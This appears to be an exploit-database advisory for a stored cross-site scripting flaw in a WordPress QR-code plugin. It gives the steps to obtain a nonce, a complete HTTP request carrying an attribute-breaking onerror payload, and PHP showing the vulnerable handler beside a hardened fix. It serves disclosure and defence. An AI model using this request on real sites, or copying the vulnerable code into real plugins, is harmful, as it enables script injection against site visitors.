## https://sploitus.com/exploit?id=WPEX-ID:65A29976-163A-4BBF-A4E8-590DDC4B83F2
To exploit this vulnerability the attacker needs access to at least an account with the capability 'edit_posts' (e.g. a contributor). This is required to obtain a nonce, which is what protects the affected AJAX function.

To obtain the nonce, the attacker requests `<your host here>/wp-admin/edit.php?post_type=qr`. The nonce is then found in an inline script with the id `qyrr-admin-js-extra`.

Inside that script, the exploitable QR posts are listed (`post_id` is the id of the post whose post meta carries the meta key 'data-uri'). There is no check whether the requesting user is the owner of that QR post.

The third required parameter is `data-uri`. This parameter carries the stored JavaScript. When the request is processed, `data-uri` is sanitized with `sanitize_text_field`, but it is not escaped when it is output in the `src` attribute of the QR code image, so a value containing a double quote breaks out of the attribute.
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94
Connection: close
Cookie: [contributor+]

action=data_uri_to_meta&nonce=d5c0a0e3fa&post_id=1238&data-uri=+%22+onerror%3Dalert(1)+e%3D%22
```
Then access the page/post where the QR code is embedded to trigger the XSS.
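As an added illustration, not code from the plugin or from the original report, the following PHP sketch places the two defects the report describes (no ownership check on `post_id`, and `sanitize_text_field` on input but no escaping on output) beside a hardened handler. All function names, the nonce action `qr_nonce` and the hook name are assumed; only the meta key 'data-uri', the post type `qr` and the capability requirement come from the report. `current_user_can( 'edit_post', $post_id )` is WordPress's per-post meta capability, which is the check the report says is missing.

```php
<?php
/**
 * Added example, not the plugin's own code. Function names, the nonce
 * action 'qr_nonce' and the hook name are hypothetical; the meta key
 * 'data-uri' and the post type 'qr' come from the report.
 */

// --- Pattern described in the report (illustrative) ------------------------
function qr_example_vulnerable_handler() {
    // The nonce only proves the caller has edit_posts, not rights on this post.
    check_ajax_referer( 'qr_nonce', 'nonce' );
    $post_id = absint( $_POST['post_id'] );
    // Missing: current_user_can( 'edit_post', $post_id ), so any contributor
    // can overwrite the meta of any QR post.
    update_post_meta( $post_id, 'data-uri', sanitize_text_field( wp_unslash( $_POST['data-uri'] ) ) );
    wp_send_json_success();
}

function qr_example_vulnerable_render( $post_id ) {
    $uri = get_post_meta( $post_id, 'data-uri', true );
    // sanitize_text_field() keeps double quotes, so a stored value can close
    // the src attribute and add its own attributes.
    return '<img src="' . $uri . '" alt="QR Code">';
}

// --- Hardened version ------------------------------------------------------
function qr_example_is_image_data_uri( $value ) {
    // Accept only a base64 data URI for a raster image; everything else is rejected.
    return (bool) preg_match( '#^data:image/(png|jpeg|gif);base64,[A-Za-z0-9+/]+={0,2}$#', $value );
}

function qr_example_hardened_handler() {
    check_ajax_referer( 'qr_nonce', 'nonce' );
    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;

    // Authorization: the target must be a QR post and the caller must be
    // allowed to edit *this* post (owner, or editor/admin).
    if ( ! $post_id || 'qr' !== get_post_type( $post_id ) || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $uri = isset( $_POST['data-uri'] ) ? sanitize_text_field( wp_unslash( $_POST['data-uri'] ) ) : '';
    // Validation on input: store only a value that can legitimately be an image src.
    if ( ! qr_example_is_image_data_uri( $uri ) ) {
        wp_send_json_error( 'invalid data-uri', 400 );
    }
    update_post_meta( $post_id, 'data-uri', $uri );
    wp_send_json_success();
}

function qr_example_hardened_render( $post_id ) {
    $uri = get_post_meta( $post_id, 'data-uri', true );
    // Re-validate stored data (it may predate the fix) and escape at output
    // time: esc_attr() encodes quotes and angle brackets, so the attribute
    // cannot be closed early whatever is stored.
    if ( ! qr_example_is_image_data_uri( $uri ) ) {
        return '';
    }
    return '<img src="' . esc_attr( $uri ) . '" alt="QR Code">';
}

add_action( 'wp_ajax_qr_example_save', 'qr_example_hardened_handler' );
```

Two points worth noting in the hardened version: the fix is layered (authorization on the post, validation of the stored value, and escaping at output), so a stale or directly edited meta value still cannot break out of the attribute; and `esc_url()` is deliberately not used for the `src`, because WordPress's default allowed-protocol list does not include `data:` and would strip a legitimate data URI, which is why the format check plus `esc_attr()` is used instead.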